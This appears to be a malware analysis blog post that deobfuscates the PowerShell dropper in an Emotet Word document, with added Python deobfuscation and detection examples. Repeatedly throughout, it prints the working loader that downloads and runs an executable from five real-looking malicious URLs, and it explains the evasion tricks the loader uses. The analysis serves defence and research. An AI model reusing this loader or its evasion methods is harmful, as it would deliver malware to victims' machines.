
Suleyman Ozarslan, PhD | February 08, 2020
Researchers identified Emotet for the first time in 2014 as banking malware that stole sensitive and private information. Now, adversaries are using Emotet as Infrastructure as a Service (IaaS) for delivering malware, including other banking Trojans. Emotet incorporates various obfuscation and evasion techniques to avoid detection, and these techniques change over time.
We revealed the obfuscated Visual Basic code in the first part of the Emotet Technical Analysis series. In this second part, we analyze the PowerShell code in the Emotet malware document (PowerShell, MITRE ATT&CK T1086).
We analyzed the following Word document step by step in the first part:
MD5: 515f13034bc4ccf635b026722fd5ef9c
SHA-1: 8925b822e1d86d787b4682d1bb803cf1f5ea7031
SHA-256:
VirusTotal detection rate: 13/61 as of January 21, 2020
Names: ST_28546448.doc, 01856218536426646.doc
Let's remember the revealed VBA code (Scripting, MITRE ATT&CK T1064):
1.
Do While GetObject(winmgmtS:win32_Process).Create("Powershell -w hidden -en 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","",GetObject("winmgmtS:win32_ProcessStartuP"),"")
Loop
In this Do While loop, the Create method of the Win32_Process class is used to create a new process.
💡 The Create method of the Win32_Process WMI class creates a new process. Syntax:
uint32 Create(
[in] string CommandLine,
[in] string CurrentDirectory,
[in] Win32_ProcessStartup ProcessStartupInformation,
[out] uint32 ProcessId
);
The parameters are:
- CommandLine: the command line to execute. It is a PowerShell command in this code (PowerShell, MITRE ATT&CK T1086).
- CurrentDirectory: the current directory of the new process. If this parameter is NULL, the new process will have the same path as the calling process.
- ProcessStartupInformation: the startup configuration of the new process, like winmgmtS:win32_ProcessStartuP in this example.
💡 The Win32_ProcessStartup abstract WMI class represents the startup configuration of a Windows-based process. The class is defined as a method type definition, which means that it is only used for passing information to the Create method of the Win32_Process class.
Therefore, the VBA code embedded in the Word document executes a PowerShell command using WMI (Windows Management Instrumentation, MITRE ATT&CK T1047).
💡 Windows Management Instrumentation (WMI) is the infrastructure for management data and operations on Windows-based operating systems.
We'll reveal the obfuscated malicious PowerShell command in this blog. Let's remember the PowerShell command:
2.
Powershell -w hidden -en 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
The command begins with the -w parameter and the hidden value: -w hidden. However, there is no parameter named -w in the official PowerShell documentation. In fact, PowerShell completes the -w parameter to the -WindowStyle parameter because of its parameter substring completion feature.
Adversaries commonly use the -WindowStyle parameter with the Hidden value in malicious PowerShell commands to avoid detection (Hidden Window, MITRE ATT&CK T1143). Actually, -WindowStyle Hidden does not entirely hide the PowerShell command window; it shows the window for a moment before hiding it.
The next parameter is -en. Similar to -w, there is no parameter named -en in the official PowerShell documentation. PowerShell completes the -en parameter to the -EncodedCommand parameter.
Therefore, we must use Base64 decoding to reveal the PowerShell command (Obfuscated Files or Information, MITRE ATT&CK T1027). After Base64 decoding:
3.
$Azytjhzgaumig='Nvxdxgccbng';$Nnyjthcrzjoyv = '937';$Iiqsfpsm='Rogxpgyve';$Ekxhlobqrlh=$env:userprofile+'\'+$Nnyjthcrzjoyv+'.exe';$Sbrypywxgcitf='Wpawybiqmj';$Hirmyhqaltos=&('new-o'+'bj'+'ect') NeT.WeBCLiEnT;$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-includes/ha5j0b1/*https://www.qwqoo.com/homldw/3piyy4/*http://siwakuposo.com/siwaku2/X5zB0ey/'."spL`iT"([char]42);$Nuoltwfqh='Qrvohdiubfek';foreach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos."Dow`Nloadfi`LE"($Ndlualuv, $Ekxhlobqrlh);$Hkukkfoptjdr='Xabdxvkfcma';If ((&('Get-I'+'tem') $Ekxhlobqrlh)."L`eng`TH" -ge 29936) {[Diagnostics.Process]::"s`TARt"($Ekxhlobqrlh);$Yzjjfplmkgx='Bxlkqmtxa';break;$Molchijx='Quatlbdlqvfdp'}}catch{}}$Rckajrxvi='Ejecwargkcl'
Let's beautify the code:
4.
$Azytjhzgaumig='Nvxdxgccbng';
$Nnyjthcrzjoyv = '937';
$Iiqsfpsm='Rogxpgyve';
$Ekxhlobqrlh=$env:userprofile+'\'+$Nnyjthcrzjoyv+'.exe';
$Sbrypywxgcitf='Wpawybiqmj';
$Hirmyhqaltos=&('new-o'+'bj'+'ect') NeT.WeBCLiEnT;
$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-includes/ha5j0b1/*https://www.qwqoo.com/homldw/3piyy4/*http://siwakuposo.com/siwaku2/X5zB0ey/'."spL`iT"([char]42);
$Nuoltwfqh='Qrvohdiubfek';
foreach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos."Dow`Nloadfi`LE"($Ndlualuv, $Ekxhlobqrlh);
$Hkukkfoptjdr='Xabdxvkfcma';
If ((&('Get-I'+'tem') $Ekxhlobqrlh)."L`eng`TH" -ge 29936) {[Diagnostics.Process]::"s`TARt"($Ekxhlobqrlh);
$Yzjjfplmkgx='Bxlkqmtxa';
break;
$Molchijx='Quatlbdlqvfdp'}}
catch{}}
$Rckajrxvi='Ejecwargkcl'
There are garbage variables to obfuscate the code. Let's remove them:
5.
$Nnyjthcrzjoyv = '937';
$Ekxhlobqrlh=$env:userprofile+'\'+$Nnyjthcrzjoyv+'.exe';
$Hirmyhqaltos=&('new-o'+'bj'+'ect') NeT.WeBCLiEnT;
$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-includes/ha5j0b1/*https://www.qwqoo.com/homldw/3piyy4/*http://siwakuposo.com/siwaku2/X5zB0ey/'."spL`iT"([char]42);
foreach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos."Dow`Nloadfi`LE"($Ndlualuv, $Ekxhlobqrlh);
If ((&('Get-I'+'tem') $Ekxhlobqrlh)."L`eng`TH" -ge 29936) {[Diagnostics.Process]::"s`TARt"($Ekxhlobqrlh);
break;}}
catch{}}
There are ` (backtick) characters, which are used to obfuscate the code. In this case, they do not escape any character, so we can remove them from the code.
6.
$Nnyjthcrzjoyv = '937';
$Ekxhlobqrlh=$env:userprofile+'\'+$Nnyjthcrzjoyv+'.exe';
$Hirmyhqaltos=&('new-o'+'bj'+'ect') NeT.WeBCLiEnT;
$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-includes/ha5j0b1/*https://www.qwqoo.com/homldw/3piyy4/*http://siwakuposo.com/siwaku2/X5zB0ey/'."spLiT"([char]42);
foreach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos."DowNloadfiLE"($Ndlualuv, $Ekxhlobqrlh);
If ((&('Get-I'+'tem') $Ekxhlobqrlh)."LengTH" -ge 29936) {[Diagnostics.Process]::"sTARt"($Ekxhlobqrlh);
break;}}
catch{}}
Let's put '937' in place of $Nnyjthcrzjoyv.
7.
$Ekxhlobqrlh=$env:userprofile+'\'+'937'+'.exe';
$Hirmyhqaltos=&('new-o'+'bj'+'ect') NeT.WeBCLiEnT;
$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-includes/ha5j0b1/*https://www.qwqoo.com/homldw/3piyy4/*http://siwakuposo.com/siwaku2/X5zB0ey/'."spLiT"([char]42);
foreach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos."DowNloadfiLE"($Ndlualuv, $Ekxhlobqrlh);
If ((&('Get-I'+'tem') $Ekxhlobqrlh)."LengTH" -ge 29936) {[Diagnostics.Process]::"sTARt"($Ekxhlobqrlh);
break;}}
catch{}}
Now, let's get rid of the + characters.
8.
$Ekxhlobqrlh=$env:userprofile\937.exe;
$Hirmyhqaltos=&('new-object') NeT.WeBCLiEnT;
$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-includes/ha5j0b1/*https://www.qwqoo.com/homldw/3piyy4/*http://siwakuposo.com/siwaku2/X5zB0ey/'."spLiT"([char]42);
foreach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos."DowNloadfiLE"($Ndlualuv, $Ekxhlobqrlh);
If ((&('Get-Item') $Ekxhlobqrlh)."LengTH" -ge 29936) {[Diagnostics.Process]::"sTARt"($Ekxhlobqrlh); break;}}
catch{}}
Let's put '$env:userprofile\937.exe' in place of $Ekxhlobqrlh, and '&('new-object') NeT.WeBCLiEnT' in place of $Hirmyhqaltos:
9.
$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-includes/ha5j0b1/*https://www.qwqoo.com/homldw/3piyy4/*http://siwakuposo.com/siwaku2/X5zB0ey/'."spLiT"([char]42);
foreach($Ndlualuv in $Rxbywici){try{&('new-object') NeT.WeBCLiEnT.DowNloadfiLE($Ndlualuv, $env:userprofile\937.exe);
If ((&('Get-Item') $env:userprofile\937.exe)."LengTH" -ge 29936) {[Diagnostics.Process]::"sTARt"($env:userprofile\937.exe);
break;}}
catch{}}
Let's change variable names with more readable ones:
10.
$list='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-includes/ha5j0b1/*https://www.qwqoo.com/homldw/3piyy4/*http://siwakuposo.com/siwaku2/X5zB0ey/'."spLiT"([char]42);
foreach($url in $list){try{&('new-object') NeT.WeBCLiEnT.DowNloadfiLE($url, $env:userprofile\937.exe);
If ((&('Get-Item') $env:userprofile\937.exe)."LengTH" -ge 29936) {[Diagnostics.Process]::"sTARt"($env:userprofile\937.exe);
break;}}
catch{}}
Now, we must reveal the $list variable. The Split() method is used in this variable. In this case, the separator is [char]42, which is equal to the * (asterisk) character. Therefore:
11.
$list=('http://ahc.mrbdev.com/wp-admin/qp0/','http://e-twow.be/verde/in6k/','https://magnificentpakistan.com/wp-includes/ha5j0b1/','https://www.qwqoo.com/homldw/3piyy4/','http://siwakuposo.com/siwaku2/X5zB0ey/')
foreach($url in $list){try{&('new-object') NeT.WeBCLiEnT."DowNloadfiLE"($url, $env:userprofile\937.exe);
If ((&('Get-Item') $env:userprofile\937.exe)."LengTH" -ge 29936) {[Diagnostics.Process]::"sTARt"($env:userprofile\937.exe); break;}}
catch{}}
Let's change the random case to PascalCase:
💡 Randomized case: In this old method, uppercase and lowercase letters appear in a random sequence in the code, which is useful to bypass weak security controls.
12.
$list=('http://ahc.mrbdev.com/wp-admin/qp0/','http://e-twow.be/verde/in6k/','https://magnificentpakistan.com/wp-includes/ha5j0b1/','https://www.qwqoo.com/homldw/3piyy4/','http://siwakuposo.com/siwaku2/X5zB0ey/')
foreach($url in $list){try{&('new-object') Net.WebClient.DownloadFile($url, $env:userprofile\937.exe);
If ((&('Get-Item') $env:userprofile\937.exe)."Length" -ge 29936) {[Diagnostics.Process]::"Start"($env:userprofile\937.exe);
break;}}
catch{}}
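As an added example, not code from the original post, the following Python script automates the manual steps above for a script passed via -EncodedCommand: it Base64-decodes the UTF-16LE payload, strips backticks that escape nothing, resolves [char]N, inlines and drops garbage variables, joins split strings, normalises the random case of known identifiers, and expands the Split() call into the URL list. It assumes the escape letters of Windows PowerShell 5.1 and runs on a constructed sample whose URLs are placeholders, not the real ones.

```python
import base64
import re
# Letters Windows PowerShell 5.1 treats as escapes after a backtick; a backtick
# before any other character (as in "Dow`Nloadfi`LE") escapes nothing.
_ESCAPES = "0abfnrtv"
# Canonical spellings for the identifiers the loader writes in random case.
_CANON = {n.lower(): n for n in ("New-Object", "Get-Item", "Net", "WebClient",
                                  "DownloadFile", "Split", "Length", "Start")}

def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries the script as Base64 of its UTF-16LE bytes."""
    return base64.b64decode(b64).decode("utf-16-le")

def deobfuscate(ps: str) -> str:
    """Undo the layers walked through above, in the same order."""
    ps = re.sub(rf"`(?![{_ESCAPES}])", "", ps)                            # "spL`iT" -> "spLiT"
    ps = re.sub(r"\[char\]\s*(\d+)", lambda m: f"'{chr(int(m[1]))}'", ps)  # [char]42 -> '*'
    ps = re.sub(r'(\.|::)"([^"]+)"', r"\1\2", ps)                         # ."Split"( -> .Split(
    # Inline variables that hold a plain string literal, then drop the
    # assignment; a variable never read again was garbage to begin with.
    for name, lit in re.findall(r"\$(\w+)\s*=\s*('[^']*');", ps):
        rest = re.sub(rf"\${name}\s*=\s*{re.escape(lit)};\s*", "", ps)
        ps = re.sub(rf"\${name}\b", lambda _m: lit, rest)
    while True:                                                           # 'new-o'+'bj'+'ect'
        joined = re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'", ps)
        if joined == ps:
            break
        ps = joined
    ps = re.sub(r"&\('([^']+)'\)", r"\1", ps)                              # &('new-object')
    ps = re.sub(r"[A-Za-z][\w-]*", lambda m: _CANON.get(m[0].lower(), m[0]), ps)
    # 'a*b'.Split('*') on a literal becomes the explicit array it produces.
    return re.sub(r"'([^']*)'\.Split\('(.)'\)",
                  lambda m: "@(" + ",".join(f"'{p}'" for p in m[1].split(m[2])) + ")",
                  ps, flags=re.I)

def analyse(encoded: str) -> dict:
    script = deobfuscate(decode_encoded_command(encoded))
    return {"script": script, "urls": re.findall(r"https?://[^\s'\"*)]+", script)}

# Constructed sample in the shape of the loader analysed above (garbage
# variables, backticks, split strings, [char]42, random case); the URLs are
# placeholders, not the real ones.
SAMPLE = ("$Aaa='Junk1';$Num = '937';$Path=$env:userprofile+'\\'+$Num+'.exe';"
          "$Bbb='Junk2';$Wc=&('new-o'+'bj'+'ect') NeT.WeBCLiEnT;"
          "$List='http://a.example/x/*https://b.example/y/'.\"spL`iT\"([char]42);"
          "foreach($U in $List){try{$Wc.\"Dow`Nloadfi`LE\"($U, $Path);"
          "If ((&('Get-I'+'tem') $Path).\"L`eng`TH\" -ge 29936) "
          "{[Diagnostics.Process]::\"s`TARt\"($Path);break;}}catch{}}$Ccc='Junk3';")
ENCODED_SAMPLE = base64.b64encode(SAMPLE.encode("utf-16-le")).decode()  # the -en argument
```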
The $list array includes the following URLs:
hxxp://ahc.mrbdev.com/wp-admin/qp0/
hxxp://e-twow.be/verde/in6k/
hxxps://magnificentpakistan.com/wp-includes/ha5j0b1/
hxxps://www.qwqoo.com/homldw/3piyy4/
hxxp://siwakuposo.com/siwaku2/X5zB0ey/
The foreach loop tries to download a file from the URLs included in the $list array in the given order via the Net.WebClient.DownloadFile method and saves the downloaded file to the $env:userprofile directory as 937.exe.
The If condition returns true if the length of the downloaded file 937.exe is greater than or equal to 29936 bytes, using the -ge 29936 comparison operator (ge: greater than or equal). If it returns true, the Diagnostics.Process.Start method executes 937.exe, then the loop exits. The exact file size of 937.exe is 905472 bytes. What could be the reason for comparing the file size? The answer is simple: adversaries are trying to figure out whether the file was actually downloaded.
💡 Diagnostics.Process.Start(string fileName): The Process.Start method of the System.Diagnostics namespace starts a process resource by specifying the name of a document or application file and associates the resource with a new Process component.
Adversaries used the Invoke-Item cmdlet to execute the downloaded file in our previous Emotet analysis. Now, they are using the Process.Start method instead of Invoke-Item to decrease the detection rate.
In our analysis, the PowerShell code downloaded 937.exe from the first URL. The other URLs are also active.
MD5: 032a5220e159fcf2f33cc9799f11ade6
SHA-1: 9768eb95d1ac398425fc5eced31b5f83025c6faf
SHA-256: cb463bc2cfbe95d234afc0d3708babb85c7e29089d3691ab0ba6695eeeccb60f
VirusTotal detection rate: 6/73 as of January 21, 2020, 49/73 as of February 6, 2020
Names: 937.exe, 565.exe
The purpose of this second part of the Emotet Technical Analysis series is to analyze the PowerShell code included in the heavily obfuscated Visual Basic macros revealed in the first article. Briefly, this PowerShell code downloads a file from a list of URLs, then executes the file as a process.
Adversaries used the following techniques in the PowerShell code for obfuscation and evasion:
- WMI was used to create a process instead of cmd. If WMI activity is not monitored, it is hard to detect the creation of the malicious process.
- Substrings of parameters were used instead of the complete parameter names. PowerShell completes the incomplete version of a parameter: -w was used for -WindowStyle and -en was used for -EncodedCommand.
- The -WindowStyle parameter was used with the Hidden value to hide the PowerShell command window.
- The Base64-encoded version of the PowerShell command was used with the -EncodedCommand parameter.
- Garbage variable assignments were used to obfuscate the code.
- The ` (backtick) character was used to obfuscate strings. For example, Dow`Nloadfi`LE was used instead of DowNloadfiLE.
- The + operator was used to concatenate fragmented strings. As an example, 'new-o'+'bj'+'ect' was used instead of new-object to evade weak security controls.
- URLs were joined with the * (asterisk) character to evade weak URL regexes of security controls. Then, the Split() method was used to separate the URLs.
- The [char] conversion function was used for obfuscation. For example, [char]42 was used for the * (asterisk) character.
- Randomized case (e.g., NeT.WeBCLiEnT) was used to bypass weak security controls.
- The Process.Start method was used to execute the downloaded file instead of a more common execution method like the Invoke-Item cmdlet.
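As an added detection example, not part of the original post, this Python snippet normalises abbreviated powershell.exe switches the way the console host does, by shortest accepted prefix, so a rule that looks for -WindowStyle Hidden and -EncodedCommand also catches -w hidden -en; it additionally flags powershell.exe whose parent is WmiPrvSE.exe, the WMI provider host in which Win32_Process.Create starts new processes. The switch table is this example's approximation of the host's matching rules, and the events are constructed.

```python
import re
# powershell.exe switches with the shortest prefix the console host accepts, in the
# order the host tests them (ExecutionPolicy before EncodedCommand, so -ex resolves
# to ExecutionPolicy while -e, -en and -enc resolve to EncodedCommand). Assumption.
_SWITCHES = [("NoExit", "noe"), ("NoProfile", "nop"), ("NoLogo", "nol"),
             ("NonInteractive", "noni"), ("Command", "c"), ("WindowStyle", "w"),
             ("File", "f"), ("ExecutionPolicy", "ex"), ("EncodedCommand", "e")]

def resolve_switch(token: str):
    """'-w' -> 'WindowStyle', '-en' -> 'EncodedCommand', ambiguous '-no' -> None."""
    key = token.lstrip("-/").lower()
    for name, shortest in _SWITCHES:
        if name.lower().startswith(key) and key.startswith(shortest):
            return name
    return None

def normalise(cmdline: str) -> str:
    """Rewrite every abbreviated switch to its full name; other tokens pass through."""
    out = []
    for tok in cmdline.split():
        full = resolve_switch(tok) if len(tok) > 1 and tok[0] in "-/" else None
        out.append("-" + full if full else tok)
    return " ".join(out)

def classify(event: dict) -> list:
    """Indicators seen in one process-creation event, after switch normalisation."""
    cmd = normalise(event["CommandLine"])
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    flags = []
    if re.search(r"-WindowStyle\s+hidden\b", cmd, re.I):
        flags.append("hidden-window")
    if re.search(r"-EncodedCommand\b", cmd):
        flags.append("encoded-command")
    if parent == "wmiprvse.exe":   # Win32_Process.Create runs inside the WMI provider host
        flags.append("wmi-spawned")
    return flags

# Constructed sample events in Sysmon event ID 1 style (the Base64 is a placeholder).
EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "Powershell -w hidden -en JABhAD0AMQA="},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -ex bypass -c Get-Date"},
]

def triage(events=EVENTS) -> list:
    hits = []   # command lines carrying two or more indicators, with their flags
    for e in events:
        flags = classify(e)
        if len(flags) >= 2:
            hits.append((e["CommandLine"], flags))
    return hits
```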
We will analyze the behavior of the executed file 937.exe in the third part of the Emotet Technical Analysis series.
MITRE's ATT&CK Techniques Observed
Execution | Defense Evasion
---|---
PowerShell (T1086) | Hidden Window (T1143)
Scripting (T1064) | Obfuscated Files or Information (T1027)
Windows Management Instrumentation (T1047) |
Indicators of Compromise (IoCs)